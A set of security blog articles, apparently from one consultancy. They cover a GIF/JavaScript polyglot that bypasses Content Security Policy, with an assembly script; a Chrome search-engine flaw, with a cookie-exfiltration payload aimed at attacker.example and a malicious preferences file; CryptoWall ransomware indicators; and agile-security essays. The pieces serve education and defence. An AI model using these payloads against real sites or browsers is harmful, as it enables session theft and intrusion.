
Malicious Memes


The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?

Background

Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

CSP is set by the web server in the form of a header and instructs the user's browser to only load and execute objects that originate from a whitelisted set of sources. For example, a common implementation of the CSP header ensures the browser only accepts scripts that come from your domain and blocks the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). CSP is a recommended security header for mitigating the damage caused by Cross-Site Scripting vulnerabilities, which it achieves by narrowing the set of locations from which scripts can be loaded. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.
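As a minimal sketch of what this looks like in practice (using Node's built-in http module; the policy value shown is just one common restrictive choice), a server might set the header like so:

```javascript
// Serve a page whose CSP only allows scripts from the page's own origin.
// Inline <script> blocks are blocked by default under this policy.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader('Content-Security-Policy', "script-src 'self'");
  res.setHeader('Content-Type', 'text/html');
  res.end('<html><body><script src="/app.js"></script></body></html>');
}).listen(8080);
```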

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client-side code into a web application and have it rendered in the browser as a part of the webpage. Usually caused by a lack of (or poorly implemented) user input sanitisation and encoding, XSS vulnerabilities allow attackers to inject malicious JavaScript (JS) that can be used to hijack users' sessions, modify content on the webpage, redirect the visitor to another website or 'hook' the victim's browser. Browser hooking is a technique for leveraging XSS vulnerabilities in which the injected script loads further scripts from a server operated by the attacker, granting the attacker greater control over the hooked browser's behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government's My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server; it usually executes when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be 'inline' with the web application, as it is loaded alongside other client-side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser, which in theory mitigates the dangers of a reflected XSS and protects the user.
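As a simple illustration (the domain is a placeholder), a reflected XSS link might look like the following; the injected script is inline, which is exactly what a strict CSP is designed to block:

```
https://vulnerable-app.example/search?q=<script>alert(document.domain)</script>
```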

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.

Polyglots

In humans, a 'polyglot' is someone who speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.
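As a minimal sketch of the idea (an illustrative snippet, not necessarily the exact code from the figures), the following is simultaneously a valid C program and a valid Perl script: the C preprocessor expands the macro into a main function, while Perl treats both '#' lines as comments and simply runs the print statement.

```c
#include <stdio.h>
#define print(s) int main(void){puts(s);return 0;}
print("Hello from a polyglot")
```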

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256-colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety, making the format inefficient for displaying detailed clips any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it's pronounced 'jiff' after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from: http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

The attack this blog will demonstrate only requires knowledge of the 'Header', 'Trailer' and 'Logical Screen Descriptor' (LSD). The data in between these represents the frames of a GIF image, and at least one frame is expected in a valid GIF. All GIF images begin with the signature 'GIF' followed by the version, '87a' or '89a', in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD, which informs the image decoder of properties that affect the whole image. The first of these are the canvas width and height values, which are stored as unsigned 16-bit integers. A '16-bit unsigned integer' is a number between 0 and 65,535 that cannot be negative (it wouldn't make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

It is also important to understand that this data in the GIF format is represented in 'little-endian', which means the least significant byte is stored first. In Figure 6 we can see the canvas size is stored as width: '0A 00' and height: '0A 00'. While seemingly backwards for humans, little-endian dictates that the decoder treat the first byte as the least significant, giving width: '000A' and height: '000A', which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is the byte '3B', which when encoded as ASCII represents a semicolon.

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image
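A minimal sketch of reading these fields (in Node.js; 'image.gif' is a placeholder path) shows the little-endian interpretation in action:

```javascript
const fs = require('fs');

const gif = fs.readFileSync('image.gif');

console.log(gif.toString('ascii', 0, 6));   // signature, e.g. 'GIF89a'
console.log(gif.readUInt16LE(6));           // canvas width  (bytes 6-7, little-endian)
console.log(gif.readUInt16LE(8));           // canvas height (bytes 8-9, little-endian)
console.log(gif[gif.length - 1] === 0x3b);  // true if the file ends with the ';' trailer
```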

Most image decoders, including browsers, will ignore anything after the trailing semicolon, making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image, data after the semicolon will likely be discarded. Hence, it's important that we can still access the raw, unedited image after it's uploaded to the server — see the 'Limitations' section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

To create our malicious image, we are using a small, non-animated GIF image, as seen in Figure 8. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is to manipulate the LSD to begin a JS comment block, as seen in Figure 10. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to implement the '/*' (begin comment block) JS token we have changed the value of the first two bytes of the LSD, which correspond to the canvas width. The bytes for '/*' are '2F 2A', which the image decoder, reading little-endian, interprets as 0x2A2F = 10799. While we still have a valid GIF image, it has a pretty whacky canvas size, as seen in the output below:

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try to execute the image as JS, the engine reads the GIF header as a variable name, ignores the comment block, and then continues by setting the variable to equal '1' — a dummy value that keeps the JS syntax valid. Then our payload is executed.
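Putting the pieces together, a rough sketch of the assembly process (in Node.js; the file names and alert payload are illustrative, and a real source image must not contain a premature '*/' byte pair inside the commented-out region) might look like this:

```javascript
const fs = require('fs');

const gif = fs.readFileSync('input.gif');

// Overwrite the LSD canvas-width bytes (offsets 6-7) with '/*' so that,
// to a JS engine, everything after the 'GIF89a' signature opens a comment.
gif[6] = 0x2f; // '/'
gif[7] = 0x2a; // '*'

// After the GIF trailer, close the comment, assign the dummy value so
// 'GIF89a' parses as a variable name, then append the payload.
const payload = Buffer.from('*/=1;alert(document.domain);');

fs.writeFileSync('polyglot.gif', Buffer.concat([gif, payload]));
```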

The image passes standard image validation techniques used by web applications, which often rely on confirming the 'magic numbers' (the signature bytes at the start of the file) of the image. Once our image is uploaded to the server, we effectively have a valid JS file originating from the web application's domain, which falls within the scope of the CSP.

As it stands, the image is loaded into the web application through the use of the HTML 'img' tag, which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with an HTML 'script src' tag.
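For example, the injected markup might look like the following (the upload path is a placeholder):

```html
<script src="https://vulnerable-app.example/uploads/polyglot.gif"></script>
```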

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.

Limitations

  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited set of JS-compatible characters that can be used in the LSD, the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server-side image manipulation that resizes the image will edit the canvas size in the LSD, corrupting our polyglot. If it's not possible to locate the original unedited image through the web application, then the image will not execute as JS.

Conclusion

While Figure 14 demos a rather mundane script execution, it confirms we now have a method of uploading and executing an XSS payload regardless of the CSP directive. The stored JS in our image acts as an uploaded script file, satisfying the CSP's same-origin requirements.

This attack proves that CSP isn't a catch-all XSS filter and can be circumvented in some cases. In application penetration testing, GIF/JS polyglots are a powerful tool for demonstrating the consequences of improper output sanitisation.

While still recommended, the CSP header should be implemented with the understanding that it is a last line of defence against XSS attacks, not a guarantee of protection for your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.


Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions, data provided by users should be sanitised and/or restricted so that malicious input — in this case, JavaScript code supplied to the browser — is rejected. Input sanitisation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Given that Google Chrome is the most popular web browser, used by approximately 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – which can be used to steal a user's browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user's session), the contents of a user's shopping cart (on an e-commerce site) and tracking information (used to track a user's web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – used to display a target user's web-browser type.
  • escape(document.baseURI); – contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.
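Chained together in a single malicious 'search URL', a payload along these lines (the attacker domain is a placeholder) could exfiltrate all three values at once on every search the victim performs:

```javascript
javascript:window.location='https://attacker.example/log?c='+escape(document.cookie)+'&a='+escape(navigator.userAgent)+'&u='+escape(document.baseURI);
```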

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to Settings > Manage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:
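A rough sketch of the shape such a file might take (the key names are based on Chrome's 'master_preferences' default search provider settings, and the attacker URL is a placeholder; this is illustrative, not the original exploit code):

```json
{
  "default_search_provider": {
    "enabled": true,
    "name": "Google",
    "keyword": "google.com",
    "search_url": "javascript:window.location='https://attacker.example/intercept?q={searchTerms}&c='+escape(document.cookie);"
  }
}
```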


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim's machine when the user opens the Chrome browser and searches for 'pwned'.
  3. Information is transmitted to and intercepted by the attacker, and the victim is then unknowingly redirected back to their search, with the attack remaining undetected.

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, provides guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, and explains how to detect and respond to these infections if they do occur. Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version 4 exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but some work on detection is taking place. ESET's anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent.

When creating rules in intrusion detection systems, firewalls, antivirus systems or centralised log management servers, the most reliable way to detect CryptoWall v4 infections is to alert on creation of the following file names, which are static within CryptoWall v4 (a simple illustration follows the list):

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG
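As a simple illustration of the idea (a Node.js sketch; real detection would live in AV/IDS/SIEM rules, and the watched path is a placeholder):

```javascript
const fs = require('fs');
const path = require('path');

const ransomNotes = new Set([
  'HELP_YOUR_FILES.TXT',
  'HELP_YOUR_FILES.HTML',
  'HELP_YOUR_FILES.PNG',
]);

// Alert whenever one of the static CryptoWall v4 ransom-note files appears.
fs.watch('C:\\Users', { recursive: true }, (event, filename) => {
  if (filename && ransomNotes.has(path.basename(filename).toUpperCase())) {
    console.error(`Possible CryptoWall v4 infection: ${filename}`);
  }
});
```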

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts on productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
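As an illustration, a regular expression covering the four domains above (JavaScript syntax here; adapt it to whatever dialect your firewall or proxy accepts) might look like:

```javascript
const blockedDomains = /(^|\.)(pastimefoods\.com|19bee88\.com|adrive62\.com|httthanglong\.com)$/i;

console.log(blockedDomains.test('www.adrive62.com')); // true
console.log(blockedDomains.test('example.com'));      // false
```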
 
In the new version of CryptoWall, infected files have their file names and extensions replaced with pseudorandom strings. As a result, encrypted files are harder to identify through pure examination of file extensions, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWall v4; two such file names are known to be associated with CryptoWall v4 infections.

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run a6c784cb “C:\Users\admin\AppData\Roaming\a6c784cb4ae38306a6.exe”

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to a number of URLs that may also be useful in developing infection detection controls.

The initial controls we have worked with most customers to implement on their corporate networks include adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e. HELP_YOUR_FILES.TXT). This enables network administrators to be promptly alerted to infections on the network, and is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing blacklists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common, and possibly the biggest, challenges when incorporating agility into security is effectively integrating security practices, such as the use of Static Application Security Testing (SAST) tools, into an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing. For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process that is in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as improbable a concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint

The Cyber Security Ecosystem: Collaborate or Collaborate. It’s your choice.


As cyber security as a field has grown in scope and influence, it has effectively become an ‘ecosystem’ of multiple players, all of whom either participate in or influence the way the field develops and/or operates. At Hivint, we believe it is crucial for those players to collaborate and work together to enhance the security posture of communities, nations and the globe, and that security consultants have an important role to play in facilitating this goal.

The ecosystem untwined

The cyber security ecosystem can broadly be divided into two categories, with some players (e.g. governments) having roles in both categories:

Macro-level players

Consists of those stakeholders who are in a position to exert influence on the way the cyber security field looks and operates at the micro-level. Key examples include governments, regulators, policymakers and standards-setting organisations and bodies (such as the International Organization for Standardization, the Internet Engineering Task Force and the National Institute of Standards and Technology).

Micro-level players

Consists of those stakeholders who, both collectively and individually, undertake actions on a day-to-day basis that affect the community’s overall cyber security posture (positively or negatively). Examples include end users/consumers, governments, online businesses, corporations, SMEs, financial institutions and security consultants (although as we’ll discuss later, the security consultant has a unique role that bridges across the other players at the micro-level).

The macro level has, in the past, been somewhat muted with its involvement in influencing developments in cyber security. Governments and regulators, for example, often operated at the fringes of cyber security and primarily left things to the micro-level. While collaboration occurred in some instances (for example, in response to cyber security incidents with national security implications), that was by no means expected.


The formalisation of collaborative security

This is rapidly changing. We are now regularly seeing more formalised models being (or planning to be) introduced to either strongly encourage or require collaboration on cyber security issues between multiple parties in the ecosystem.

Recent prominent examples include proposed draft legislation in Australia that would, if implemented, require nominated telecommunications service providers and network operators to notify government security agencies of network changes that could affect the ability of those networks to be protected[1], proposals for introducing legislative frameworks to encourage cyber security information sharing between the private sector and government in the United States[2], and the introduction of a formal requirement in the European Union for companies in certain sectors to report major security incidents to national authorities[3].

There are any number of reasons for this change, although the increasing public visibility given to cyber security incidents is likely at the top of the list (in October alone we have seen two of Australia’s major retailers suffer security breaches). In addition, there is a growing predilection toward collaborative models of governance in a range of cyber topic areas that have an international dimension (for example, the internet community is currently involved in deep discussions around transitioning the governance model for the internet’s DNS functions away from US government control towards a multi-stakeholder model). With cyber security issues frequently having a trans-national element — particularly discussions around setting ‘norms’ of conduct around cyber security at an international level[4] — it’s likely that players at the macro-level see this as an appropriate time to become more involved in influencing developments in the field at the national level.

Given this trend, it’s unlikely to be long before the macro-level players start to require compliance with minimum standards of security at the micro-level. As an example, the proposed Australian legislation referred to above would require network operators and service providers to do their best (by taking all reasonable steps) to protect their networks from unauthorised access or interference. And in the United States, a Federal Court of Appeals recently decided that their national consumer protection authority, the Federal Trade Commission, had jurisdiction to determine what might constitute an appropriate level of security for businesses in the United States to meet in order to avoid potential liability[5]. In Germany, legislation recently came into effect requiring minimum security requirements to be met by operators of critical infrastructure.

Security consultants — the links in the collaboration chain

Whatever the reasons for the push towards ‘collaborative’ security, it’s the micro-level players who work in the cyber security field day-to-day who will ultimately need to respond as more formal expectations regarding their security posture are placed on them by players at the macro-level.

Hivint was in large part established to respond to this trend — we believe that security consultants have a crucial role to play in this process, including through building a system in which the outputs of consulting projects are shared within communities of interest who are facing common security challenges, thereby minimising redundant expenditure on security issues that other organisations have already faced. This system is called “The Security Colony” and is available now[6]. For more information on the reasons for its creation and what we hope to achieve, see our previous article on this topic.

We also believe there is a positive linkage between facilitating more collaboration between players at the micro-level of the ecosystem, and encouraging the creation of more proactive security cultures within organisations. Enabling businesses to minimise expenditure on security problems that have already been considered in other consulting projects enables them to focus their energies on implementing measures to encourage more proactive security — for example, as we discussed in a previous article, by educating employees on the importance of identifying and reporting basic security risks (such as the inappropriate sharing of system passwords). And encouraging a more proactive security culture within organisations will ultimately strengthen the nation’s overall cyber security posture and benefit the community as a whole.


Article by Craig Searle, Chief Apiarist, Hivint


[1] See in particular the proposed changes to section 313 of the Telecommunications Act 1997 (Cth).
[2] See https://www.fas.org/sgp/crs/misc/R44069.pdf for a description of these proposals.
[3] See http://ec.europa.eu/digital-agenda/en/news/network-and-information-security-nis-directive
[4] See for example http://www.project-syndicate.org/commentary/international-norms-cyberspace-by-joseph-s–nye-2015-05
[5] See http://www.technologylawdispatch.com/2015/08/privacy-data-protection/third-circuit-upholds-ftcs-authority-in-wyndham-case/?utm_source=Mondaq&utm_medium=syndication&utm_campaign=View-Original
[6] https://www.securitycolony.com/

An Elephant in Ballet Slippers? Bringing Agility To Cyber Security


As enterprise IT and development teams embrace Agile concepts more and more, we are seeing an increased need for cyber security teams to be similarly agile and able to adapt to rapidly evolving environments. Cyber security teams that will not or cannot make the necessary changes will eventually find themselves irrelevant; too far removed from the function and flow of the organisation to provide meaningful value, resulting in an increased risk for the organisation and its interests.

So, how do we fit the elephant (cyber security) with ballet slippers (agility)?

Firstly, in an age of devops, continuous integration and continuous deployment, it is critical to understand the evolving role of the cyber security team. The team’s focus on rigorous definition, enforcement and assurance of security controls is giving way to active education, collaboration and continual improvement within non-traditional security functions. This is primarily because the developers, the operations team and the sysadmins have all become the front line for the security team. These teams spend their working lives making decisions that will impact the security of the products and platforms, and ultimately the security of the enterprise. Rather than risk being seen as the ‘department of no’, the cyber security team needs to embrace the change that agile development brings and find ways to improve the enterprise through enhancing the skills and capabilities of these teams.

First and foremost is education. If the devops team don’t know, or even worse don’t value, security controls and secure practices, then the systems they develop and maintain will never be secure. It is the role of the cyber security team to ensure that all members of the development and operations teams understand that security doesn’t need to be difficult; it can be implemented well if it is inherent to the development process. This is typically achieved through ongoing training and education, both formal and informal.

Secure development and devops training courses are widely available and are absolutely a valuable part of the toolkit, but they tend to be rather static in nature, and bad habits often creep back in over time. Informal education through peer review, feedback and information sharing is far more consistent and reliable, as long as there is a clear security ethos established for the team to work from. This is particularly the case for the senior members of the team passing on their knowledge to newer or less experienced members.

Security champions are crucial in filling this role. Ideally a security champion is a member of the security team that works with the development team on a daily, even hourly, basis. One of the most important parts of this role is that the security champion needs to be able to ‘speak geek’ and understand the challenges facing the team when trying to rapidly develop applications. A background in development or devops means that they can speak from experience and be empathetic when dealing with the development teams. The security advice they provide needs to be pragmatic, weighing up the relative risks and benefits, and it needs to be delivered in a way that is meaningful to the rest of the development team.

An ability to get their ‘hands dirty’ and actually assist in aspects of code development or systems maintenance is definitely a bonus. The security champion also needs to drive the implementation of tools and services to support the rapid identification, assessment and remediation of security vulnerabilities in code or platforms. Wherever possible these security tools need to be seamlessly built into the existing development, deployment and testing tools (think Bamboo, Jira, Jenkins, Circle CI and Selenium) so that security assessment becomes transparent to the overall development and deployment processes. The security champion should also be responsible for bringing a cyber-security context into the design stages of development. This is often best achieved by flagging stories (Agile-speak for detailed use-cases) as ‘secure’, meaning that particular attention needs to be paid to that component: user input, authentication, database calls and connections to external systems/APIs will all require additional analysis.

Finally, and possibly most importantly, it is critical that organisations develop a culture of security, in which insecure practices are treated as a real no-no in day-to-day business behaviour. A good comparison is the nature of OH&S (Occupational Health & Safety) practices in the workplace today. 15–20 years ago the typical workplace was not as safe as it is now; things like trip hazards and puddles of liquid weren’t necessarily seen as a big issue.

Nowadays staff recognise them as a safety risk and have been trained to respond accordingly or raise the issue with someone who will. Cyber security needs to arrive at the same point. Staff need to be aware of what constitutes ‘safe’ and ‘unsafe’ cyber security behaviours, and feel confident in calling out unsafe practices.

Observing a team member sharing a password or leaving a workstation unlocked shouldn’t be something that is seen as normal practice — it needs to be identified as a risk and addressed immediately, with the security team being part of the solution to the problem. Pointing out an insecure practice but not providing a practical solution will only alienate the security team. As staff become aware and feel confident in calling out unsafe activities, with the support of the security team to address them, security becomes part of the cultural DNA and is more readily passed on to new team members and new initiatives.

Agile development does present a number of challenges to a cyber-security team. Trying to adhere to the same practices and controls that were implemented 5–10 years ago is ultimately destined for failure, as the rate of change is too rapid for them to be effective. Adapting practices to maintain relevancy to the evolving environment is the only way to remain effective and best protect the organisation and its customers.


Article by Craig Searle, Chief Apiarist, Hivint

Maturing Organisational Security and Security Service Catalogues


One of the key objectives for an information security professional is providing assurance that the systems which are implemented, or are soon to be implemented, are secure. A large part of this involves engaging with business and project teams proactively to ensure that security needs are met, while trying hard not to interfere with on-time project delivery.

Unfortunately, we’re not very good at it.

Recently, having agreed to conduct a security risk assessment (SRA) of a client’s SFTP solution, which they intended to use to transfer files to a vendor in place of their existing process of emailing the files, I sat down to discuss the security requirement with the Solution Designer, only to have him tell me that an SRA had been done before. Not just on the same design pattern, but on the exact same SFTP solution. They were simply adding an additional existing vendor to the solution to improve the security of their inter-company file transfer process. The organisation didn’t know how to go about evaluating the risks to the company of this change, so they used the ‘best fit’ security-related process available to it, which just happened to be an SRA.

Granted, in the example above, a new vendor might need to be assessed for the operational risk associated with them uploading files to our client’s environment, or an assessment might be warranted if there were changes to the SFTP solution configuration. But in this case, the vendor had been working with them for some time, so there was no further risk introduced, just a more secure business process: the risk was getting lower, not higher.

